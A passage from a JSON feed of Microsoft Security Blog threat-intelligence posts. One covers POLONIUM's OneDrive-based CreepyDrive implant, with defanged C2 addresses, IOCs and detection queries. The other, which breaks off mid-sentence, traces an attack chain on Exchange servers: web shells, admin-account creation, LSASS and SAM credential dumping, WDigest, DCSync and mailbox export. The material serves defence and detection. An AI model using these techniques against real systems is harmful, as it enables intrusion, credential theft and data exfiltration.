"NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-10189"], "modified": "2020-04-28T16:00:49", "id": "MSSECURE:E3C8B97294453D962741782EC959E79C", "href": "https://www.microsoft.com/security/blog/2020/04/28/ransomware-groups-continue-to-target-healthcare-critical-services-heres-how-to-reduce-risk/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-06T10:57:29", "description": "Microsoft successfully detected and disabled attack activity abusing OneDrive by a previously undocumented Lebanon-based activity group Microsoft Threat Intelligence Center (MSTIC) tracks as POLONIUM. The associated indicators and tactics were used by the OneDrive team to improve detection of attack activity and disable offending actor accounts. To further address this abuse, Microsoft has suspended more than 20 malicious OneDrive applications created by POLONIUM actors, notified affected organizations, and deployed a series of security intelligence updates that will quarantine tools developed by POLONIUM operators. Our goal with this blog is to help deter future activity by exposing and sharing the POLONIUM tactics with the community at large.\n\nMSTIC assesses with high confidence that POLONIUM represents an operational group based in Lebanon. We also assess with moderate confidence that the observed activity was coordinated with other actors affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based primarily on victim overlap and commonality of tools and techniques. Such collaboration or direction from Tehran would align with a string of revelations since late 2020 that the Government of Iran is using third parties to carry out cyber operations on their behalf, likely to enhance Iran\u2019s plausible deniability.\n\nPOLONIUM has targeted or compromised more than 20 organizations based in Israel and one intergovernmental organization with operations in Lebanon over the past three months. This actor has deployed unique tools that abuse legitimate cloud services for command and control (C2) across most of their victims. POLONIUM was observed creating and using legitimate OneDrive accounts, then utilizing those accounts as C2 to execute part of their attack operation. This activity does not represent any security issues or vulnerabilities on the OneDrive platform. In addition, MSTIC does not, at present, see any links between this activity and other publicly documented groups linked to Lebanon like Volatile Cedar. This blog will also expose further details that show Iranian threat actors may be collaborating with proxies to operationalize their attacks. Microsoft continues to work across its platforms to identify abuse, take down malicious activity, and implement new proactive protections to discourage malicious actors from using our services.\n\nAs with any observed nation-state actor activity, Microsoft directly notifies customers that have been targeted or compromised, providing them with the information they need to secure their accounts.\n\n## Observed actor activity\n\nSince February 2022, POLONIUM has been observed primarily targeting organizations in Israel with a focus on critical manufacturing, IT, and Israel\u2019s defense industry. In at least one case, POLONIUM\u2019s compromise of an IT company was used to target a downstream aviation company and law firm in a supply chain attack that relied on service provider credentials to gain access to the targeted networks. Multiple manufacturing companies they targeted also serve Israel\u2019s defense industry, indicating a POLONIUM tactic that follows an increasing trend by many actors, including among several Iranian groups, of targeting service provider access to gain downstream access. Observed victim organizations were in the following sectors: critical manufacturing, information technology, transportation systems, defense industrial base, government agencies and services, food and agriculture, financial services, healthcare and public health, and other business types.\n\n### POLONIUM TTPs shared with Iran-based nation-state actors\n\nMSTIC assesses with moderate confidence that POLONIUM is coordinating its operations with multiple tracked actor groups affiliated with Iran\u2019s Ministry of Intelligence and Security (MOIS), based on victim overlap and the following common techniques and tooling:\n\n * **Common unique victim targeting: **MSTIC has observed POLONIUM active on or targeting multiple victims that MERCURY previously compromised. According to the [US Cyber Command](<https://www.cybercom.mil/Media/News/Article/2897570/iranian-intel-cyber-suite-of-malware-uses-open-source-tools/>), MuddyWater, a group we track as MERCURY, \u201cis a subordinate element within the Iranian Ministry of Intelligence and Security.\u201d\n * **Evidence of possible \u201chand-off\u201d operations:** The uniqueness of the victim organizations suggests a convergence of mission requirements with MOIS. It may also be evidence of a \u2018hand-off\u2019 operational model where MOIS provides POLONIUM with access to previously compromised victim environments to execute new activity. MSTIC continues to monitor both actors to further verify this \u2018hand-off\u2019 hypothesis.\n * **Use of OneDrive for C2: ** MSTIC has observed both POLONIUM and DEV-0133 (aka [Lyceum](<https://www.secureworks.com/blog/lyceum-takes-center-stage-in-middle-east-campaign>)) using cloud services, including OneDrive, for data exfiltration and command and control. \n * **Use of AirVPN: **Both POLONIUM and DEV-0588 (aka CopyKittens) commonly use AirVPN for operational activity. While use of public VPN services is common across many actor sets, these actors\u2019 specific choice to use AirVPN, combined with the additional overlaps documented above, further supports the moderate confidence assessment that POLONIUM collaborates with MOIS.\n\n### Abuse of cloud services\n\nPOLONIUM has been observed deploying a series of custom implants that utilize cloud services for command and control as well as data exfiltration. MSTIC has observed implants connecting to POLONIUM-owned accounts in OneDrive and Dropbox. These tools are detected as the following malware:\n\n * Trojan:PowerShell/CreepyDrive.A!dha\n * Trojan:PowerShell/CreepyDrive.B!dha\n * Trojan:PowerShell/CreepyDrive.C!dha\n * Trojan:PowerShell/CreepyDrive.D!dha\n * Trojan:PowerShell/CreepyDrive.E!dha\n * Trojan:MSIL/CreepyBox.A!dha\n * Trojan:MSIL/CreepyBox.B!dha\n * Trojan:MSIL/CreepyBox.C!dha\n\nWhile OneDrive performs antivirus scanning on all uploaded content, POLONIUM is not using the cloud service to host their malware. If malware was hosted in the OneDrive account, Microsoft Defender Antivirus detections would block it. Instead, they are interacting with the cloud service in the same way that a legitimate customer would. OneDrive is partnering with MSTIC to identify and disable accounts that are linked to known adversary behavior.\n\n### CreepyDrive analysis\n\nThe CreepyDrive implant utilizes a POLONIUM-owned OneDrive storage account for command and control. The implant provides basic functionality of allowing the threat actor to upload stolen files and download files to run.\n\nAll web requests by the CreepyDrive implant use the _Invoke-WebRequest_ cmdlet. The implant\u2019s logic is wrapped in a _while true_ loop, ensuring continuous execution of the implant once running. The implant contains no native persistence mechanism; if terminated it would need to be re-executed by the threat actor.\n\nDue to the lack of victim identifiers in the CreepyDrive implant, using the same OneDrive account for multiple victims, while possible, may be challenging. It\u2019s likely that a different threat actor-controlled OneDrive account is used per implant.\n\n##### **Getting an OAuth token**\n\nWhen run, the implant first needs to authenticate with OneDrive. The threat actor incorporated a refresh token within the implant. Refresh tokens are part of the Open Authorization 2 (OAuth) specification, allowing a new OAuth token to be issued when it expires. There are several mechanisms that make token theft difficult, including the use of the trusted platform module (TPM) to protect secrets. More information on these mechanisms can be found [here](<https://docs.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token>).\n\nIn this instance, the protection settings tied to the OneDrive account are fully controlled by the threat actor, allowing them to disable protections that prevent the theft of the token and client secrets. As the threat actor is in full control of all secrets and key material associated with the account, their sign-in activity looks like legitimate customer behavior and is thus challenging to detect.\n\nThis token and client secret are transmitted in the body of request to a legitimate Microsoft endpoint to generate an OAuth token:\n \n \n https[://]login.microsoftonline.com/consumers/oauth2/v2.0/token\n\nThis request provides the requisite OAuth token for the implant to interact with the threat actor-owned OneDrive account. Using this OAuth token, the implant makes a request to the following Microsoft Graph API endpoint to access the file _data.txt_:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/data.txt:/content\n\nThe file _data.txt_ acts as the primary tasking mechanism for the implant, providing three branches of execution.\n\n**Upload**\n\nThe first branch is triggered when the word \u201cupload\u201d is provided in the response. This response payload also contains two additional elements: a local file path to upload, and what is likely a threat actor-defined remote file name to upload the local file into. The request is structured as follows:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Uploaded/???:/content\n\n**Download**\n\nThe second branch is triggered when the word \u201cdownload\u201d is provided in the response. This response payload contains a file name to download from the threat actor-owned OneDrive account. The request is structured as follows:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Downloaded/???:/content\n\n**Execute**\n\nThis branch is triggered when no command is provided in the response. The response payload can contain either an array of commands to execute or file paths to files previously downloaded by the implant. The threat actor can also provide a mixture of individual commands and file paths.\n\nEach value from the array is passed individually into the below custom function, which uses the _Invoke-Expression_ cmdlet to run commands:\n\n\n\nThe output of each executed command is aggregated and then written back to the following location in the threat actor-owned OneDrive account:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/response.json:/content\n\nDuring the execution of this mechanism, the threat actor resets the content of the original tasking file _data.txt_ with the following request:\n \n \n https[://]graph.microsoft.com/v1.0/me/drive/root:/Documents/data.txt:/content\n\nFinally, the CreepyDrive implant sleeps, re-executing in a loop until the process is terminated.\n\n### Use of custom implant\n\nPOLONIUM has also been observed deploying a custom PowerShell implant detected as Backdoor:PowerShell/CreepySnail.B!dha. The C2s for observed CreepySnail implants include:\n\n * 135[.]125[.]147[.]170:80\n * 185[.]244[.]129[.]79:63047\n * 185[.]244[.]129[.]79:80\n * 45[.]80[.]149[.]108:63047\n * 45[.]80[.]149[.]108:80\n * 45[.]80[.]149[.]57:63047\n * 45[.]80[.]149[.]68:63047\n * 45[.]80[.]149[.]71:80\n\nThe code below demonstrates how the CreepySnail PowerShell implant, once deployed on a target network, attempts to authenticate using stolen credentials and connect to POLONIUM C2 for further actions on objectives, such as data exfiltration or further abuse as C2.\n\n  \n\n### Use of commodity tools\n\nPOLONIUM has also been observed dropping a secondary payload via their OneDrive implant. POLONIUM used a common SSH tool for automating interactive sign-ins called _plink_ to set up a redundant tunnel from the victim environment to the attacker-controlled infrastructure.\n\nThe observed C2 IP addresses for POLONIUM plink tunnels include:\n\n * 185[.]244[.]129 [.]109\n * 172[.]96[.]188[.]51\n * 51[.]83 [.]246 [.]73\n\n### Exploitation\n\nWhile we continue to pursue confirmation of how POLONIUM gained initial access to many of their victims, MSTIC notes that approximately 80% of the observed victims beaconing to _graph.microsoft.com_ were running Fortinet appliances. This suggests, but does not definitively prove, that POLONIUM compromised these Fortinet devices by exploiting the [CVE-2018-13379](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379>) vulnerability to gain access to the compromised organizations.\n\n### IT supply chain attacks\n\nIn one case, POLONIUM compromised a cloud service provider based in Israel and likely used this access to compromise downstream customers of the service provider. Specifically, MSTIC observed that POLONIUM pivoted through the service provider and gained access to a law firm and an aviation company in Israel. The tactic of leveraging IT products and service providers to gain access to downstream customers remains a favorite of Iranian actors and their proxies.\n\nMicrosoft will continue to monitor ongoing activity from POLONIUM and the other Iranian MOIS-affiliated actors discussed in this blog and implement protections for our customers. The current detections, advanced detections, and IOCs in place across our security products are detailed below.\n\n## Recommended customer actions\n\nThe techniques used by the actor described in the \u201cObserved actor activity\u201d section can be mitigated by adopting the security considerations provided below:\n\n * Use the included indicators of compromise to investigate whether they exist in your environment and assess for potential intrusion. [Microsoft Sentinel](<https://azure.microsoft.com/services/microsoft-sentinel/#overview>) queries are provided in the advanced hunting section below.\n * Confirm that Microsoft Defender Antivirus is updated to [security intelligence update 1.365.40.0 or later](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/manage-updates-baselines-microsoft-defender-antivirus>), or ensure that [cloud protection](<https://docs.microsoft.com/microsoft-365/security/defender-endpoint/cloud-protection-microsoft-defender-antivirus>) is turned on, to detect the related indicators.\n * Block in-bound traffic from IPs specified in the \u201cIndicators of compromise\u201d table.\n * Review all authentication activity for remote access infrastructure (VPNs), with a particular focus on accounts configured with single factor authentication, to confirm authenticity and investigate any anomalous activity.\n * Enable multifactor authentication (MFA) to mitigate potentially compromised credentials and ensure that MFA is enforced for all remote connectivity. _NOTE:_ Microsoft strongly encourages all customers download and use passwordless solutions like [Microsoft Authenticator](<https://www.microsoft.com/account/authenticator/>) to secure your accounts.\n * For customers that have relationships with service providers, [review and audit partner relationships](<https://docs.microsoft.com/microsoft-365/commerce/manage-partners?view=o365-worldwide>) to minimize any unnecessary permissions between your organization and upstream providers. Microsoft recommends immediately removing access for any partner relationships that look unfamiliar or have not yet been audited.\n\n## Indicators of compromise (IOCs)\n\nThe below list provides IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\n**Indicator**| **Type**| **Description** \n---|---|--- \n135[.]125[.]147[.]170:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]79:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]79:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]108:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]108:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]57:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]68:63047| IPv4 address| C2 for POLONIUM CreepySnail implant \n45[.]80[.]149[.]71:80| IPv4 address| C2 for POLONIUM CreepySnail implant \n185[.]244[.]129[.]109| IPv4 address| C2 for POLONIUM plink tunnels \n172[.]96[.]188[.]51| IPv4 address| C2 for POLONIUM plink tunnels \n51[.]83[.]246[.]73| IPv4 address| C2 for POLONIUM plink tunnels \nTrojan:PowerShell/CreepyDrive.A!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.B!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.C!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.D!dha| Tool| Custom implant signature \nTrojan:PowerShell/CreepyDrive.E!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.A!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.B!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyBox.C!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyRing.A!dha| Tool| Custom implant signature \nTrojan:MSIL/CreepyWink.B!dha| Tool| Custom implant signature \nBackdoor:PowerShell/CreepySnail.B!dha| Tool| Custom implant signature \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Detections\n\n### Microsoft 365 Defender\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malware tools and implants used by POLONIUM starting from signature build 1.365.40.0 as the following:\n\n * Trojan:PowerShell/CreepyDrive.A!dha\n * Trojan:PowerShell/CreepyDrive.B!dha\n * Trojan:PowerShell/CreepyDrive.C!dha\n * Trojan:PowerShell/CreepyDrive.D!dha\n * Trojan:PowerShell/CreepyDrive.E!dha\n * Trojan:MSIL/CreepyBox.A!dha\n * Trojan:MSIL/CreepyBox.B!dha\n * Trojan:MSIL/CreepyBox.C!dha\n * Trojan:MSIL/CreepyRing.A!dha\n * Trojan:MSIL/CreepyWink.B!dha\n * Backdoor:PowerShell/CreepySnail.B!dha\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint customers may see any or a combination of the following alerts as an indication of possible attack. These alerts are not necessarily an indication of POLONIUM compromise:\n\n * POLONIUM Actor Activity Detected\n * PowerShell made a suspicious network connection\n * Suspicious behavior by powershell.exe was observed\n * Hidden dual-use tool launch attempt\n * Outbound connection to non-standard port\n\n**Microsoft Defender for Cloud Apps**\n\nThe OAuth apps that were created in the victim tenants were created with only two specific scope of permissions: _offline_access_ and _Files.ReadWrite.All_. These applications were set to serve multi-tenant and performed only OneDrive operations. Applications accessed OneDrive workload via the Graph API, where most calls to the API from the application were made as search activities, with a few edit operations also observed.\n\nApp made numerous searches and edits in OneDrive\n\nApp governance, an add-on to Microsoft Defender for Cloud Apps, detects malicious OAuth applications that make numerous searches and edits in OneDrive. [Learn how to investigate anomaly detection alerts](<https://docs.microsoft.com/en-us/defender-cloud-apps/app-governance-anomaly-detection-alerts#app-made-numerous-searches-and-edits-in-onedrive>) in Microsoft Defender for Cloud Apps.\n\nMicrosoft Defender for Cloud Apps alert for malicious OAuth apps\n\n## Advanced hunting queries\n\n### Microsoft Sentinel\n\n#### Identify POLONIUM IOCs\n\nThis query identifies POLONIUM network IOCs within available Azure Sentinel network logging:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/POLONIUMIPIoC.yaml>\n\n#### Detect CreepySnail static URI parameters\n\nThe CreepySnail tool utilizes static URI parameters that can be detected using the following query:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepySnailURLParameters.yaml>\n\n#### Detect Base64-encoded/transmitted machine usernames or IP addresses \n\nCreepySnail also utilizes Base64-encoded parameters to transmit information from the victim to threat actor. The following queries detect machine usernames or IP addresses (based on Microsoft Defender for Endpoint logging) being transmitted under Base64 encoding in a web request:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/B64UserInWebURIFromMDE.yaml>\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/B64IPInURLFromMDE.yaml>\n\n#### Detect POLONIUM requests to predictable OneDrive file paths\n\nThe OneDrive capability that POLONIUM utilizes makes requests to predictable OneDrive file paths to access various folders and files. The following queries detect these paths in use:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepyDriveURLs.yaml>\n\n#### Detect sequence of request events related to unique CreepyDrive re-authentication attempts\n\nThe CreepyDrive implant makes a predictable sequence of requests to Microsoft authentication servers and OneDrive that can be detected using the following query:\n\n<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/CommonSecurityLog/CreepyDriveRequestSequence.yaml>\n\n#### Hunt for other suspicious encoded request parameters\n\nThe following hunting queries can be used to hunt for further suspicious encoded request parameters:\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/CommonSecurityLog/B64IPInURL.yaml>\n\n<https://github.com/Azure/Azure-Sentinel/tree/master/Hunting%20Queries/CommonSecurityLog/RiskyCommandB64EncodedInUrl.yaml>\n\nThe post [Exposing POLONIUM activity and infrastructure targeting Israeli organizations](<https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T16:00:00", "type": "mssecure", "title": "Exposing POLONIUM activity and infrastructure targeting Israeli organizations", "bulletinFamily": "blog", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2022-06-02T16:00:00", "id": "MSSECURE:A2F131E46442125176E4853C860A816C", "href": "https://www.microsoft.com/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-06-26T22:16:11", "description": "Securing Exchange servers is one of the most important things defenders can do to limit organizational exposure to attacks. Any threat or vulnerability impacting Exchange servers should be treated with the highest priority because these servers contain critical business data, as well as highly privileged accounts that attackers attempt to compromise to gain admin rights to the server and, consequently, complete control of the network.\n\nIf compromised, Exchange servers provide a unique environment that could allow attackers to perform various tasks using the same built-in tools or scripts that admins use for maintenance. This is exacerbated by the fact that Exchange servers have traditionally lacked antivirus solutions, network protection, the latest security updates, and proper security configuration, often intentionally, due to the misguided notion that these protections interfere with normal Exchange functions. Attackers know this, and they leverage this knowledge to gain a stable foothold on a target organization.\n\nThere are two primary ways in which Exchange servers are compromised. The first and more common scenario is attackers launching social engineering or drive-by download attacks targeting endpoints, where they steal credentials and move laterally to other endpoints in a progressive dump-escalate-move method until they gain access to an Exchange server.\n\nThe second scenario is where attackers exploit a remote code execution vulnerability affecting the underlying Internet Information Service (IIS) component of a target Exchange server. This is an attacker\u2019s dream: directly landing on a server and, if the server has misconfigured access levels, gain system privileges.\n\nThe first scenario is more common, but we\u2019re seeing a rise in attacks of the second variety; specifically, attacks that exploit Exchange vulnerabilities like [CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>). The [security update](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>) that fixes this vulnerability has been available for several months, but, notably, to this day, attackers find vulnerable servers to target.\n\nIn many cases, after attackers gain access to an Exchange server, what follows is the deployment of web shell into one of the many web accessible paths on the server. As we discussed in a previous blog, [web shells](<https://www.microsoft.com/security/blog/2020/02/04/ghost-in-the-shell-investigating-web-shell-attacks/>) allow attackers to steal data or perform malicious actions for further compromise.\n\n## Behavior-based detection and blocking of malicious activities on Exchange servers\n\nAdversaries like using web shells, which are relatively small pieces of malicious code written in common programming languages, because these can be easily modified to evade traditional file-based protections. A more durable approach to detecting web shell activity involves profiling process activities originating from external-facing Exchange applications.\n\n[Behavior-based blocking and containment](<https://www.microsoft.com/security/blog/2020/03/09/behavioral-blocking-and-containment-transforming-optics-into-protection/>) capabilities in Microsoft Defender ATP, which use engines that specialize in [detecting threats by analyzing behavior](<https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks/>), surface suspicious and malicious activities on Exchange servers. These detection engines are powered by cloud-based machine learning classifiers that are trained by expert-driven profiling of legitimate vs. suspicious activities in Exchange servers.\n\nIn April, multiple Exchange-specific behavior-based detections picked up unusual activity. The telemetry showed attackers operating on on-premises Exchange servers using deployed web shells. Whenever attackers interacted with the web shell, the hijacked application pool ran the command on behalf of the attacker, generating an interesting process chain. Common services, for example Outlook on the web (formerly known as Outlook Web App or OWA) or Exchange admin center (EAC; formerly known as the Exchange Control Panel or ECP), executing _net.exe_, _cmd.exe_, and other known living-off-the-land binaries ([LOLBins](<https://github.com/LOLBAS-Project/LOLBAS/blob/master/README.md>)) like _mshta.exe_ is very suspicious and should be further investigated.\n\n\n\n_Figure 1. Behavior-based detections of attacker activity on Exchange servers_\n\nIn this blog, we\u2019ll share our investigation of the Exchange attacks in early April, covering multiple campaigns occurring at the same time. The data and techniques from this analysis make up an anatomy of Exchange server attacks. Notably, the attacks used multiple fileless techniques, adding another layer of complexity to detecting and resolving these threats, and demonstrating how behavior-based detections are key to protecting organizations.\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Exchange-servers-attack-chain-2.png>)\n\n_Figure 2. Anatomy of an Exchange server attack_\n\n## Initial access: Web shell deployment\n\nAttackers started interacting with target Exchange servers through web shells they had deployed. Any path accessible over the internet is a potential target for web shell deployment, but in these attacks, the most common client access paths were:\n\n * _%ProgramFiles%\\Microsoft\\Exchange Server\\&lt;version&gt;\\ClientAccess_\n * _%ProgramFiles%\\Microsoft\\Exchange Server\\&lt;version&gt;\\FrontEnd_\n\nThe ClientAccess and FrontEnd directories provide various client access services such as Outlook on the web, EAC, and AutoDiscover, to name a few. These IIS virtual directories are automatically configured during server installation and provide authentication and proxy services for internal and external client connections.\n\nThese directories should be monitored for any new file creation. While file creation events alone cannot be treated as suspicious, correlating such events with the responsible process results in more reliable signals. Common services like OWA or ECP dropping _.aspx_ or _.ashx_ files in any of the said directories is highly suspicious.\n\nIn our investigation, most of these attacks used the [China Chopper](<https://attack.mitre.org/software/S0020/>) web shell. The attackers tried to blend the web shell script file with other _.aspx_ files present on the system by using common file names. In many cases, hijacked servers used the \u2018echo\u2019 command to write the web shell. In other cases, _certutil.exe_ or _powershell.exe_ were used. Here are some examples of the China Chopper codes that were dropped in these attacks:\n\n\n\nWe also observed the attackers switching web shells or introducing two or more for various purposes. In one case, the attackers created an _.ashx_ version of a popular, publicly available _.aspx_ web shell, which exposes minimum functionality:\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/A-suspicious-web-script-was-created.png>)\n\n_Figure 3. Microsoft Defender ATP alert for web shell_\n\n## Reconnaissance\n\nAfter web shell deployment, attackers typically ran an initial set of exploratory commands like _whoami_, _ping_, and _net user_. In most cases, the hijacked application pool services were running with system privileges, giving attackers the highest privilege.\n\nAttackers enumerated all local groups and members on the domain to identify targets. Interestingly, in some campaigns, attackers used open-source user group enumerating tools like _lg.exe_ instead of the built-in _net.exe_. Attackers also used the [EternalBlue](<https://www.microsoft.com/security/blog/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) exploit and _nbtstat_ scanner to identify vulnerable machines on the network.\n\n\n\nNext, the attackers ran built-in Exchange Management Shell cmdlets to gain more information about the exchange environment. Attackers used these cmdlets to perform the following:\n\n * List all Exchange admin center virtual directories in client access services on all Mailbox servers in the network\n * Get a summary list of all the Exchange servers in the network\n * Get information on mailboxes, such as size and number of items, along with role assignments and permissions.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Anomalous-account-lookups.png>)\n\n_Figure 4. Microsoft Defender ATP alert showing process tree for anomalous account lookups_\n\n## Persistence\n\nOn misconfigured servers where they have gained the highest privileges, attackers were able to add a new user account on the server. This gave the attackers the ability to access the server without the need to deploy any remote access tools.\n\nThe attackers then added the newly created account to high-privilege groups like Administrators, Remote Desktop Users, and Enterprise Admins, practically making the attackers a domain admin with unrestricted access to any users or group in the organization.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/New-local-admin-added-using-Net-commands.png>)\n\n_Figure 5. Microsoft Defender ATP alert showing process tree for addition of local admin using Net commands_\n\n## Credential access\n\nExchange servers contain the most sensitive users and groups in an organization. Gaining credentials to these accounts could virtually give attackers domain admin privileges.\n\nIn our investigation, the attackers first dumped user hashes by saving the Security Account Manager (SAM) database from the registry.\n\n\n\nNext, the attackers used the ProcDump tool to dump the Local Security Authority Subsystem Service (LSASS) memory. The dumps were later archived and uploaded to a remote location.\n\n\n\nIn some campaigns, attackers dropped Mimikatz and tried to dump hashes from the server.\n\n\n\n[](<https://www.microsoft.com/security/blog/wp-content/uploads/2020/06/Malicious-credential-theft-tool-execution-detected.png>)\n\n_Figure 6. Microsoft Defender ATP alert on detection of Mimikatz_\n\nIn environments where Mimiktaz was blocked, attackers dropped a modified version with hardcoded implementation to avoid detection. Attackers also added a wrapper written in the Go programming language to make the binary more than 5 MB. The binary used the open-source MemoryModule library to load the binary using [reflective DLL injection](<https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/>). Thus, the payload never touched the disk and was present only in memory, achieving a fileless persistence.\n\nThe attackers also enabled \u2018_wdigest_\u2019 registry settings, which forced the system to use WDigest protocol for authentication, resulting in _lsass.exe_ retaining a copy of the user\u2019s plaintext password in memory. This change allowed the attacker to steal the actual password, not just the hash.\n\n\n\n\n\nAnother example of stealthy execution that attackers implemented was creating a wrapper binary for ProcDump and Mimikatz. When run, the tool dropped and executed the ProcDump binary to dump the LSASS memory. The memory dump was loaded inside the same binary and parsed to extract passwords, another example of [reflective DLL injection](<https://www.microsoft.com/security/blog/2017/11/13/detecting-reflective-dll-loading-with-windows-defender-atp/>) where the Mimikatz binary was present only in memory.\n\n\n\nWith attacker-controlled accounts now part of Domain Admins group, the attackers performed a technique called [DCSYNC](<https://attack.mitre.org/techniques/T1003/>) attack, which abuses the Active Directory replication capability to request account information, such as the NTLM hashes of all the users\u2019 passwords in the organization. This technique is extremely stealthy because it can be performed without running a single command on the actual domain controller.\n\n\n\n## Lateral movement\n\nIn these attacks, the attackers used several known methods to move laterally:\n\n * The attackers heavily abused WMI for executing tools on remote systems.\n\n\n\n * The attackers also used other techniques such as creating service or schedule task on remote systems.\n\n\n\n\n\n * In some cases, the attackers simply run commands on remote systems using PsExec.\n\n\n\n## Exchange Management Shell abuse\n\nThe Exchange Management Shell is the PowerShell interface for administrators to manage the Exchange server. As such, it exposes many critical Exchange PowerShell cmdlets to allow admins to perform various maintenance tasks, such as assigning roles and permissions, and migration, including importing and exporting mailboxes. These cmdlets are available only on Exchange servers in the Exchange Management Shell or through remote PowerShell connections to the Exchange server.\n\nTo understand suspicious invocation of the Exchange Management Shell, we need to go one step back in the process chain and analyze the responsible process. As mentioned, common application pools_ MSExchangeOWAAppPool_ or _MSExchangeECPAppPool _accessing the shell should be considered suspicious.\n\nIn our investigation, attackers leveraged these admin cmdlets to perform critical tasks such as exporting mailboxes or running arbitrary scripts. Attackers used different ways to load and run PowerShell cmdlets through the Exchange Management Shell.\n\n\n\nIn certain cases, attackers created a PowerShell wrapper around the commands to effectively hide behind legitimate PowerShell activity.\n\n\n\nThese cmdlets allowed the attackers to perform the following:\n\n * Search received email\n\nIn our investigations, attackers were primarily interested in received emails. They searched for message delivery information filtered by the event \u2018Received\u2019. The search time frame showed the attackers were initially interested in the entire log history. Later, a similar command was run with a trimmed timeline of one year.\n\n\n\n * Export mailbox\n\nAttackers exported mailboxes through these four steps:\n\n 1. 1. Granted _ApplicationImpersnation_ role to the attacker-controlled account. This effectively allowed the supplied account to access all mailboxes in the organization.\n 2. Granted \u2018Mailbox Import Export\u2019 role to the attacker-controlled account. This role is required to be added before attempting mailbox export.\n 3. Exported the mailbox with filter \u201c_Received -gt \u201801/01/2020 0:00:00_\u2019\u201d.\n 4. Removed the mailbox export request to avoid raising suspicion.\n\n\n\n\n\n## Tampering with security tools\n\nAs part of lateral movement, the attackers attempted to disable Microsoft Defender Antivirus. Attackers also disabled archive scanning to bypass detection of tools and data compressed in .zip files, as well as created exclusion for _.dat_ extension. The attackers tried to disable automatic updates to avoid any detection by new intelligence updates. For Microsoft Defender ATP customers, [tamper protection](<https://docs.microsoft.com/windows/security/threat-protection/windows-defender-antivirus/prevent-changes-to-security-settings-with-tamper-protection>) prevents such malicious and unauthorized changes to security 